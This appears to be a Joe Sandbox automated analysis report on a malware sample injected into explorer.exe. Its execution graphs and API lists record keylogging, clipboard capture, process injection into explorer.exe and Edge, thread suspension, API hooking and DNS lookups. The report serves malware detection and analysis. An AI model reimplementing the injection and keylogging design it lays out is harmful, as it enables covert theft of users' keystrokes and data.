                                                                                                                                                                control_flow_graph 68 35a048-35a04b 69 35a055-35a059 68->69 70 35a065 69->70 71 35a05b-35a063 69->71 72 35a067 70->72 73 35a04d-35a053 70->73 71->70 74 35a06a-35a071 72->74 73->69 76 35a073-35a07b 74->76 77 35a07d 74->77 76->77 77->74 78 35a07f-35a082 77->78 79 35a084-35a092 78->79 80 35a097-35a0a4 78->80 81 35a094-35a095 79->81 82 35a0ce-35a0e9 79->82 94 35a0a6-35a0a8 80->94 95 35a0be-35a0cc call 35a00a 80->95 81->80 83 35a11a-35a11d 82->83 85 35a122-35a129 83->85 86 35a11f-35a120 83->86 88 35a12f-35a133 85->88 87 35a101-35a105 86->87 92 35a107-35a10a 87->92 93 35a0eb-35a0ee 87->93 90 35a135-35a14e LoadLibraryA 88->90 91 35a190-35a1e4 VirtualProtect * 2 88->91 100 35a14f-35a156 90->100 98 35a1e8-35a1ed 91->98 92->85 96 35a10c-35a110 92->96 93->85 101 35a0f0 93->101 97 35a0ab-35a0b2 94->97 95->69 102 35a0f1-35a0f5 96->102 103 35a112-35a119 96->103 112 35a0b4-35a0ba 97->112 113 35a0bc 97->113 98->98 104 35a1ef-35a1fe 98->104 100->88 106 35a158 100->106 101->102 102->87 111 35a0f7-35a0f9 102->111 103->83 109 35a164-35a16c 106->109 110 35a15a-35a162 106->110 114 35a16e-35a17a 109->114 110->114 111->87 115 35a0fb-35a0ff 111->115 112->113 113->95 113->97 117 35a185-35a18f 114->117 118 35a17c-35a183 114->118 115->87 115->92 118->100
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE ref: 0035A147
                                                                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 0035A1BB
                                                                                                                                                                • VirtualProtect.KERNELBASE ref: 0035A1D9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.3873306436.0000000000357000.00000040.80000000.00040000.00000000.sdmp, Offset: 00357000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_357000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 895956442-0
                                                                                                                                                                • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                                • Instruction ID: 67830443a64c6c07018f6b4160dbcb7b6984e1c351857914a76bdd7db32a2294
                                                                                                                                                                • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                                • Instruction Fuzzy Hash: 45517D31368D1D0BCB26AA3C9CC4AB5B7C1F755327F14072AD88AC32E5D559D94EA383

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:9.6%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                                                                Signature Coverage:17.7%
                                                                                                                                                                Total number of Nodes:322
                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                execution_graph 1019 ad182d 1020 ad1838 RtlEnterCriticalSection lstrlenW 1019->1020 1021 ad18a8 RtlLeaveCriticalSection Sleep 1020->1021 1026 ad1854 1020->1026 1021->1020 1026->1021 1027 ad29eb VirtualQuery GetProcessHeap HeapFree 1026->1027 1028 ad25a4 1026->1028 1034 ad200d 1026->1034 1045 ad29ae VirtualFree 1026->1045 1046 ad2a09 GetProcessHeap RtlAllocateHeap 1026->1046 1027->1026 1029 ad25b9 CryptBinaryToStringA 1028->1029 1030 ad25e8 1028->1030 1029->1030 1031 ad25cc 1029->1031 1030->1026 1047 ad2a09 GetProcessHeap RtlAllocateHeap 1031->1047 1033 ad25d7 CryptBinaryToStringA 1033->1030 1035 ad2030 1034->1035 1036 ad2023 lstrlen 1034->1036 1048 ad2a09 GetProcessHeap RtlAllocateHeap 1035->1048 1036->1035 1038 ad2038 lstrcat 1039 ad206d lstrcat 1038->1039 1040 ad2074 1038->1040 1039->1040 1049 ad20a1 1040->1049 1043 ad29eb 3 API calls 1044 ad2097 1043->1044 1044->1026 1045->1026 1046->1026 1047->1033 1048->1038 1083 ad240f 1049->1083 1053 ad20ce 1088 ad298a lstrlen MultiByteToWideChar 1053->1088 1055 ad20dd 1089 ad24cc RtlZeroMemory 1055->1089 1058 ad212f RtlZeroMemory 1060 ad2164 1058->1060 1059 ad29eb 3 API calls 1061 ad2084 1059->1061 1064 ad23f1 1060->1064 1066 ad2192 1060->1066 1091 ad243d 1060->1091 1061->1043 1063 ad23d7 1063->1064 1065 ad29eb 3 API calls 1063->1065 1064->1059 1065->1064 1066->1063 1100 ad2a09 GetProcessHeap RtlAllocateHeap 1066->1100 1068 ad2262 wsprintfW 1069 ad2288 1068->1069 1072 ad22f5 1069->1072 1101 ad2a09 GetProcessHeap RtlAllocateHeap 1069->1101 1071 ad22c2 wsprintfW 1071->1072 1073 ad23b4 1072->1073 1102 ad2a09 GetProcessHeap RtlAllocateHeap 1072->1102 1074 ad29eb 3 API calls 1073->1074 1076 ad23c8 1074->1076 1076->1063 1077 ad29eb 3 API calls 1076->1077 1077->1063 1078 ad23ad 1081 ad29eb 3 API calls 1078->1081 1079 ad2340 1079->1078 1103 ad29bd VirtualAlloc 1079->1103 1081->1073 1082 ad239a RtlMoveMemory 1082->1078 1084 ad2419 1083->1084 1085 ad20c0 1083->1085 1086 ad2841 2 API calls 1084->1086 1087 ad2a09 GetProcessHeap RtlAllocateHeap 1085->1087 1086->1085 1087->1053 1088->1055 1090 ad20ed 1089->1090 1090->1058 1090->1064 1092 ad24ab 1091->1092 1094 ad244a 1091->1094 1092->1066 1093 ad244e DnsQuery_W 1093->1094 1094->1092 1094->1093 1095 ad248d DnsFree inet_ntoa 1094->1095 1095->1094 1096 ad24ad 1095->1096 1104 ad2a09 GetProcessHeap RtlAllocateHeap 1096->1104 1098 ad24b7 1105 ad298a lstrlen MultiByteToWideChar 1098->1105 1100->1068 1101->1071 1102->1079 1103->1082 1104->1098 1105->1092 1106 ad162b 1107 ad163c 1106->1107 1112 ad16aa 1106->1112 1108 ad164b GetKeyboardState 1107->1108 1107->1112 1109 ad165c ToUnicode 1108->1109 1108->1112 1110 ad1684 1109->1110 1110->1112 1113 ad16b9 RtlEnterCriticalSection 1110->1113 1114 ad17ce RtlLeaveCriticalSection 1113->1114 1115 ad16d2 lstrlenW 1113->1115 1114->1112 1116 ad16ed lstrlenW 1115->1116 1117 ad17bd 1115->1117 1121 ad1702 1116->1121 1117->1114 1118 ad174e GetForegroundWindow 1118->1117 1120 ad175a GetWindowTextW 1118->1120 1119 ad1723 1119->1117 1132 ad17dc 1119->1132 1123 ad177a lstrcmpW 1120->1123 1124 ad1771 GetClassNameW 1120->1124 1121->1118 1121->1119 1126 ad17bf lstrcatW 1123->1126 1127 ad178b lstrcpyW 1123->1127 1124->1123 1125 ad172f wsprintfW 1128 ad17b6 1125->1128 1126->1117 1129 ad17dc 4 API calls 1127->1129 1131 ad29eb 3 API calls 1128->1131 1130 ad1798 wsprintfW 1129->1130 1130->1128 1131->1117 1135 ad2a09 GetProcessHeap RtlAllocateHeap 1132->1135 1134 ad17ed GetLocalTime wsprintfW 1134->1125 1135->1134 1136 ad1581 1137 ad158e 1136->1137 1138 ad1623 1137->1138 1139 ad15a7 GlobalLock 1137->1139 1139->1138 1140 ad15b5 1139->1140 1141 ad15e4 1140->1141 1142 ad15c0 1140->1142 1157 ad293e 1141->1157 1143 ad15c5 lstrlenW 1142->1143 1144 ad15f2 1142->1144 1156 ad2a09 GetProcessHeap RtlAllocateHeap 1143->1156 1146 ad2724 VirtualQuery 1144->1146 1148 ad15fb 1146->1148 1150 ad15ff lstrlenW 1148->1150 1151 ad161b GlobalUnlock 1148->1151 1149 ad15d8 lstrcatW 1149->1144 1150->1151 1152 ad160a 1150->1152 1151->1138 1153 ad16b9 19 API calls 1152->1153 1154 ad1614 1153->1154 1155 ad29eb 3 API calls 1154->1155 1155->1151 1156->1149 1158 ad294d lstrlen 1157->1158 1159 ad2982 1157->1159 1164 ad2a09 GetProcessHeap RtlAllocateHeap 1158->1164 1159->1144 1161 ad2963 MultiByteToWideChar 1161->1159 1162 ad297b 1161->1162 1163 ad29eb 3 API calls 1162->1163 1163->1159 1164->1161 771 ad9ae0 772 ad9ca4 771->772 773 ad9aeb 771->773 772->772 774 ad9bfa LoadLibraryA 773->774 777 ad9c3f VirtualProtect VirtualProtect 773->777 775 ad9c11 774->775 775->773 778 ad9c23 GetProcAddress 775->778 777->772 778->775 779 ad9c39 778->779 780 ad1000 781 ad1007 780->781 782 ad1010 780->782 784 ad1016 781->784 825 ad2724 VirtualQuery 784->825 787 ad1098 787->782 789 ad102c RtlMoveMemory 790 ad104d 789->790 791 ad1072 GetCurrentProcessId 789->791 853 ad2a09 GetProcessHeap RtlAllocateHeap 790->853 795 ad109f 791->795 796 ad1093 791->796 794 ad1053 RtlMoveMemory 794->791 828 ad10a5 795->828 796->787 797 ad1096 796->797 854 ad13ae RtlZeroMemory VirtualQuery 797->854 799 ad10a4 801 ad2a09 GetProcessHeap RtlAllocateHeap 799->801 802 ad10bf 801->802 803 ad2a09 GetProcessHeap RtlAllocateHeap 802->803 804 ad10cc wsprintfA 803->804 808 ad10f3 804->808 805 ad276d OpenFileMappingA MapViewOfFile 805->808 806 ad129a Sleep 806->808 807 ad2841 lstrlen lstrlen 807->808 808->805 808->806 808->807 809 ad275a UnmapViewOfFile CloseHandle 808->809 824 ad1148 808->824 809->806 810 ad2a09 GetProcessHeap RtlAllocateHeap 811 ad1150 RtlMoveMemory CreateToolhelp32Snapshot 810->811 812 ad1171 Process32First 811->812 811->824 814 ad118d 812->814 815 ad127e CloseHandle 812->815 813 ad29eb VirtualQuery GetProcessHeap HeapFree 813->824 816 ad1190 CharLowerA 814->816 815->824 817 ad11ab lstrcmpiA 816->817 818 ad1266 Process32Next 816->818 817->818 817->824 818->816 818->824 819 ad12ae 16 API calls 819->824 820 ad26c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 820->824 821 ad2724 VirtualQuery 821->824 822 ad1208 lstrcmpiA 822->824 823 ad18bf 30 API calls 823->824 824->808 824->810 824->813 824->815 824->818 824->819 824->820 824->821 824->822 824->823 826 ad101e 825->826 826->787 827 ad2a09 GetProcessHeap RtlAllocateHeap 826->827 827->789 883 ad2a09 GetProcessHeap RtlAllocateHeap 828->883 830 ad10bf 884 ad2a09 GetProcessHeap RtlAllocateHeap 830->884 832 ad10cc wsprintfA 836 ad10f3 832->836 834 ad129a Sleep 834->836 835 ad2841 lstrlen lstrlen 835->836 836->834 836->835 838 ad1148 836->838 885 ad276d OpenFileMappingA 836->885 950 ad275a UnmapViewOfFile CloseHandle 836->950 838->836 844 ad127e CloseHandle 838->844 847 ad1266 Process32Next 838->847 850 ad2724 VirtualQuery 838->850 851 ad1208 lstrcmpiA 838->851 888 ad2a09 GetProcessHeap RtlAllocateHeap 838->888 889 ad12ae 838->889 908 ad26c9 OpenProcess 838->908 914 ad18bf 838->914 945 ad29eb 838->945 840 ad1150 RtlMoveMemory CreateToolhelp32Snapshot 840->838 841 ad1171 Process32First 840->841 843 ad118d 841->843 841->844 845 ad1190 CharLowerA 843->845 844->838 846 ad11ab lstrcmpiA 845->846 845->847 846->838 846->847 847->838 847->845 850->838 851->838 853->794 855 ad13e4 854->855 975 ad2a09 GetProcessHeap RtlAllocateHeap 855->975 857 ad1402 GetModuleFileNameA 976 ad2a09 GetProcessHeap RtlAllocateHeap 857->976 859 ad1418 GetCurrentProcessId wsprintfA 977 ad2799 CryptAcquireContextA 859->977 862 ad145f RtlInitializeCriticalSection 982 ad2a09 GetProcessHeap RtlAllocateHeap 862->982 863 ad151b 864 ad29eb 3 API calls 863->864 866 ad1522 864->866 869 ad29eb 3 API calls 866->869 867 ad147f Sleep 983 ad25f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 867->983 870 ad1529 RtlExitUserThread 869->870 880 ad1533 870->880 871 ad1496 GetModuleHandleA GetProcAddress 872 ad14b5 871->872 873 ad14c6 GetModuleHandleA GetProcAddress 871->873 991 ad1f3a 872->991 875 ad14d9 873->875 876 ad14ea GetModuleHandleA 873->876 877 ad1f3a 3 API calls 875->877 1001 ad1e89 876->1001 877->876 880->795 881 ad25f1 10 API calls 882 ad1501 CreateThread CloseHandle 881->882 882->863 883->830 884->832 886 ad2794 885->886 887 ad2781 MapViewOfFile 885->887 886->836 887->886 888->840 890 ad12c5 889->890 904 ad13a4 889->904 890->904 951 ad29bd VirtualAlloc 890->951 892 ad12d9 lstrlen 952 ad2a09 GetProcessHeap RtlAllocateHeap 892->952 894 ad29eb 3 API calls 898 ad1375 894->898 897 ad1399 959 ad29ae VirtualFree 897->959 898->897 906 ad1388 PathMatchSpecA 898->906 899 ad1329 RtlMoveMemory 955 ad2569 899->955 900 ad1353 RtlMoveMemory 901 ad2569 2 API calls 900->901 907 ad1351 901->907 904->838 905 ad12f0 905->907 953 ad2841 lstrlen lstrlen 905->953 906->897 906->898 907->894 909 ad271c 908->909 910 ad26e7 IsWow64Process 908->910 909->838 911 ad26f8 IsWow64Process 910->911 912 ad270a 910->912 911->912 913 ad2715 CloseHandle 911->913 912->913 913->909 915 ad2724 VirtualQuery 914->915 916 ad18d9 915->916 917 ad18eb OpenProcess 916->917 918 ad1b1c 916->918 917->918 919 ad1904 917->919 918->838 920 ad2724 VirtualQuery 919->920 921 ad190b 920->921 921->918 922 ad1919 NtSetInformationProcess 921->922 923 ad1935 921->923 922->923 960 ad1b26 923->960 926 ad1b26 2 API calls 927 ad197c 926->927 928 ad1b19 CloseHandle 927->928 929 ad1b26 2 API calls 927->929 928->918 930 ad19a6 929->930 966 ad1bbd 930->966 933 ad1b26 2 API calls 934 ad19d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 933->934 935 ad1a2b 934->935 936 ad1af4 CreateRemoteThread 934->936 938 ad1a31 CreateMutexA GetLastError 935->938 941 ad1a61 GetModuleHandleA GetProcAddress ReadProcessMemory 935->941 937 ad1b0b CloseHandle 936->937 939 ad1b0d CloseHandle CloseHandle 937->939 938->935 940 ad1a4d CloseHandle Sleep 938->940 939->928 940->938 942 ad1aed 941->942 943 ad1a92 WriteProcessMemory 941->943 942->937 942->939 943->942 944 ad1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 943->944 944->942 946 ad2724 VirtualQuery 945->946 947 ad29f3 946->947 948 ad2a07 947->948 949 ad29f7 GetProcessHeap HeapFree 947->949 948->838 949->948 950->834 951->892 952->905 954 ad130c RtlZeroMemory 953->954 954->899 954->900 956 ad25a1 955->956 958 ad2577 lstrlen RtlMoveMemory 955->958 956->905 958->956 959->904 961 ad1b3a 960->961 964 ad195a 960->964 962 ad1b4a NtCreateSection 961->962 963 ad1b69 961->963 962->963 963->964 965 ad1b7e NtMapViewOfSection 963->965 964->926 965->964 967 ad1bd4 966->967 973 ad1c06 966->973 968 ad1bd6 RtlMoveMemory 967->968 968->968 968->973 969 ad19b6 NtUnmapViewOfSection 969->933 970 ad1c69 970->969 972 ad1c87 LdrProcessRelocationBlock 970->972 971 ad1c17 LoadLibraryA 971->969 971->973 972->969 972->970 973->970 973->971 974 ad1c47 GetProcAddress 973->974 974->969 974->973 975->857 976->859 978 ad27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 977->978 979 ad1445 CreateMutexA GetLastError 977->979 980 ad2805 wsprintfA 978->980 979->862 979->863 980->980 981 ad2827 CryptDestroyHash CryptReleaseContext 980->981 981->979 982->867 984 ad2631 983->984 985 ad2681 CloseHandle 984->985 986 ad2671 Thread32Next 984->986 987 ad263d OpenThread 984->987 985->871 986->984 988 ad2658 SuspendThread 987->988 989 ad2660 ResumeThread 987->989 990 ad2666 CloseHandle 988->990 989->990 990->986 992 ad1fad 991->992 993 ad1f44 991->993 992->873 993->992 1010 ad1fea VirtualProtect 993->1010 995 ad1f5b 995->992 1011 ad29bd VirtualAlloc 995->1011 997 ad1f67 998 ad1f71 RtlMoveMemory 997->998 999 ad1f84 997->999 998->999 1012 ad1fea VirtualProtect 999->1012 1002 ad2724 VirtualQuery 1001->1002 1003 ad1e93 1002->1003 1004 ad14fa 1003->1004 1013 ad1ed8 1003->1013 1004->881 1008 ad1eba 1008->1004 1018 ad1fea VirtualProtect 1008->1018 1010->995 1011->997 1012->992 1015 ad1eea 1013->1015 1016 ad1e9e 1013->1016 1014 ad1f04 lstrcmp 1014->1015 1014->1016 1015->1014 1015->1016 1016->1004 1017 ad1fea VirtualProtect 1016->1017 1017->1008 1018->1004

                                                                                                                                                                Callgraph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                • Disassembly available
                                                                                                                                                                callgraph 0 Function_00AD182D 1 Function_00AD29AE 0->1 8 Function_00AD25A4 0->8 24 Function_00AD200D 0->24 28 Function_00AD2A09 0->28 36 Function_00AD29EB 0->36 2 Function_00AD12AE 2->1 13 Function_00AD29BD 2->13 2->28 35 Function_00AD2569 2->35 2->36 44 Function_00AD2841 2->44 45 Function_00AD255C 2->45 3 Function_00AD26AE 4 Function_00AD13AE 20 Function_00AD1F3A 4->20 27 Function_00AD1E89 4->27 4->28 32 Function_00AD2799 4->32 4->36 41 Function_00AD25F1 4->41 5 Function_00AD162B 19 Function_00AD16B9 5->19 6 Function_00AD10A5 6->2 6->3 7 Function_00AD2724 6->7 16 Function_00AD18BF 6->16 23 Function_00AD288D 6->23 25 Function_00AD268F 6->25 6->28 34 Function_00AD276D 6->34 6->36 43 Function_00AD26C9 6->43 6->44 48 Function_00AD275A 6->48 8->28 9 Function_00AD3627 10 Function_00AD1E26 17 Function_00AD1CBF 10->17 11 Function_00AD1B26 12 Function_00AD20A1 12->13 15 Function_00AD243D 12->15 12->23 26 Function_00AD240F 12->26 12->28 29 Function_00AD298A 12->29 12->36 42 Function_00AD24CC 12->42 14 Function_00AD1BBD 15->28 15->29 16->7 16->11 16->14 18 Function_00AD293E 18->28 18->36 19->36 46 Function_00AD17DC 19->46 20->13 21 Function_00AD1FB4 20->21 37 Function_00AD1FEA 20->37 38 Function_00AD1E66 20->38 21->10 22 Function_00AD1533 24->12 24->28 24->36 26->44 27->7 27->37 47 Function_00AD1ED8 27->47 30 Function_00AD1581 30->7 30->18 30->19 30->28 30->36 31 Function_00AD1000 33 Function_00AD1016 31->33 33->2 33->3 33->4 33->6 33->7 33->16 33->23 33->25 33->28 33->34 33->36 33->43 33->44 33->48 36->7 38->17 39 Function_00AD9AE0 40 Function_00AD29E0 46->28

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00AD2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,00AD29F3,-00000001,00AD128C), ref: 00AD2731
                                                                                                                                                                  • Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
                                                                                                                                                                  • Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00AD1038
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00AD106C
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00AD1075
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00AD1010), ref: 00AD107B
                                                                                                                                                                • wsprintfA.USER32 ref: 00AD10E7
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00AD1155
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD1160
                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00AD117F
                                                                                                                                                                • CharLowerA.USER32(?), ref: 00AD1199
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00AD11B5
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00AD1212
                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00AD126C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AD127F
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 00AD129F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                                                                • String ID: %s%s$0-FwP,Fw$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                                • API String ID: 3206029838-540694534
                                                                                                                                                                • Opcode ID: 8f27d9a442bf1b3d7ef7e5a88c7efb42d3a0d324831a8cadc4b35c57cdb355ad
                                                                                                                                                                • Instruction ID: 970c921788df6eb60dd3f0247392b6be311efbb2cd8d4cb0d89a0c5702585963
                                                                                                                                                                • Opcode Fuzzy Hash: 8f27d9a442bf1b3d7ef7e5a88c7efb42d3a0d324831a8cadc4b35c57cdb355ad
                                                                                                                                                                • Instruction Fuzzy Hash: D351F531605301AFCB14EFB0DD89ABE77A9EB54740F04062BF957873A1EA319E06D762

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00AD2A09: GetProcessHeap.KERNEL32(00000008,0000A000,00AD10BF), ref: 00AD2A0C
                                                                                                                                                                  • Part of subcall function 00AD2A09: RtlAllocateHeap.NTDLL(00000000), ref: 00AD2A13
                                                                                                                                                                • wsprintfA.USER32 ref: 00AD10E7
                                                                                                                                                                  • Part of subcall function 00AD276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00AD2777
                                                                                                                                                                  • Part of subcall function 00AD276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00AD10FE), ref: 00AD2789
                                                                                                                                                                • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00AD1155
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AD1160
                                                                                                                                                                • Process32First.KERNEL32(00000000,?), ref: 00AD117F
                                                                                                                                                                • CharLowerA.USER32(?), ref: 00AD1199
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 00AD11B5
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00AD1212
                                                                                                                                                                • Process32Next.KERNEL32(00000000,00000128), ref: 00AD126C
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00AD127F
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 00AD129F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                                • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                                                                • API String ID: 3018447944-2805246637
                                                                                                                                                                • Opcode ID: 757e87ccefaeb9ca4a128df135a99f3c774ae1b16e4cc74cec5641d32284e429
                                                                                                                                                                • Instruction ID: 981b0d1f1218fe9351cef2fbbca5a8de2276a52b5e981e2aa08daa44bfac3bf6
                                                                                                                                                                • Opcode Fuzzy Hash: 757e87ccefaeb9ca4a128df135a99f3c774ae1b16e4cc74cec5641d32284e429
                                                                                                                                                                • Instruction Fuzzy Hash: FD41C2316053016FCB14EFB49D85ABE77AAEB94740F00062AF953873E1EB319E06D762

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 123 ad9ae0-ad9ae5 124 ad9cad 123->124 125 ad9aeb-ad9af8 123->125 124->124 126 ad9b0a-ad9b0f 125->126 127 ad9b11 126->127 128 ad9b00-ad9b05 127->128 129 ad9b13 127->129 130 ad9b06-ad9b08 128->130 131 ad9b18-ad9b1a 129->131 130->126 130->127 132 ad9b1c-ad9b21 131->132 133 ad9b23-ad9b27 131->133 132->133 133->131 134 ad9b29 133->134 135 ad9b2b-ad9b32 134->135 136 ad9b34-ad9b39 134->136 135->131 135->136 137 ad9b48-ad9b4a 136->137 138 ad9b3b-ad9b44 136->138 139 ad9b4c-ad9b51 137->139 140 ad9b53-ad9b57 137->140 141 ad9bba-ad9bbd 138->141 142 ad9b46 138->142 139->140 144 ad9b59-ad9b5e 140->144 145 ad9b60-ad9b62 140->145 143 ad9bc2-ad9bc5 141->143 142->137 146 ad9bc7-ad9bc9 143->146 144->145 147 ad9b84-ad9b93 145->147 148 ad9b64 145->148 146->143 149 ad9bcb-ad9bce 146->149 151 ad9b95-ad9b9c 147->151 152 ad9ba4-ad9bb1 147->152 150 ad9b65-ad9b67 148->150 149->143 153 ad9bd0-ad9bec 149->153 154 ad9b69-ad9b6e 150->154 155 ad9b70-ad9b74 150->155 151->151 156 ad9b9e 151->156 152->152 157 ad9bb3-ad9bb5 152->157 153->146 158 ad9bee 153->158 154->155 155->150 159 ad9b76 155->159 156->130 157->130 160 ad9bf4-ad9bf8 158->160 161 ad9b78-ad9b7f 159->161 162 ad9b81 159->162 163 ad9c3f-ad9c42 160->163 164 ad9bfa-ad9c10 LoadLibraryA 160->164 161->150 161->162 162->147 166 ad9c45-ad9c4c 163->166 165 ad9c11-ad9c16 164->165 165->160 169 ad9c18-ad9c1a 165->169 167 ad9c4e-ad9c50 166->167 168 ad9c70-ad9ca0 VirtualProtect * 2 166->168 170 ad9c63-ad9c6e 167->170 171 ad9c52-ad9c61 167->171 172 ad9ca4-ad9ca8 168->172 173 ad9c1c-ad9c22 169->173 174 ad9c23-ad9c30 GetProcAddress 169->174 170->171 171->166 172->172 175 ad9caa 172->175 173->174 176 ad9c39-ad9c3c 174->176 177 ad9c32-ad9c37 174->177 175->124 177->165
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD8000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD8000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad8000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: b8b7a89c90ef100450692ea287cee9b5d9519901d37171806cdf852f9f6d1236
                                                                                                                                                                • Instruction ID: dcf949fde62d4c8e9b0a9834aa6dca336db60c033d79fbba63b0084a21265db4
                                                                                                                                                                • Opcode Fuzzy Hash: b8b7a89c90ef100450692ea287cee9b5d9519901d37171806cdf852f9f6d1236
                                                                                                                                                                • Instruction Fuzzy Hash: 2B511571A542524ED7219B78DCC07A2B7A4EB52324B29073BC5E7CB3C6E7A4DC06C7A0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 178 ad276d-ad277f OpenFileMappingA 179 ad2794-ad2798 178->179 180 ad2781-ad2791 MapViewOfFile 178->180 180->179
                                                                                                                                                                APIs
                                                                                                                                                                • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00AD2777
                                                                                                                                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,00AD10FE), ref: 00AD2789
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.3873768309.0000000000AD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00AD1000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_ad1000_explorer.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$MappingOpenView
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3439327939-0
                                                                                                                                                                • Opcode ID: aeacee4600423ef30d848265fe0b78d20a320dbac1644743223c60765a33e169
                                                                                                                                                                • Instruction ID: a722d954eda20a2025bdff3ab0fc998377f511da4c0c8efb90ee115ef8a069ff
                                                                                                                                                                • Opcode Fuzzy Hash: aeacee4600423ef30d848265fe0b78d20a320dbac1644743223c60765a33e169
                                                                                                                                                                • Instruction Fuzzy Hash: 2ED01732702231BBE7349BBB6C0CF87BEADDF86AE1B010026B50ED2150D6608811C2F0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 181 ad275a-ad276c UnmapViewOfFile CloseHandle
                                                                                                                                                                APIs
                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000,?,00AD129A,00000001), ref: 00AD275E
                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,00AD129A,00000001), ref: 00AD2765
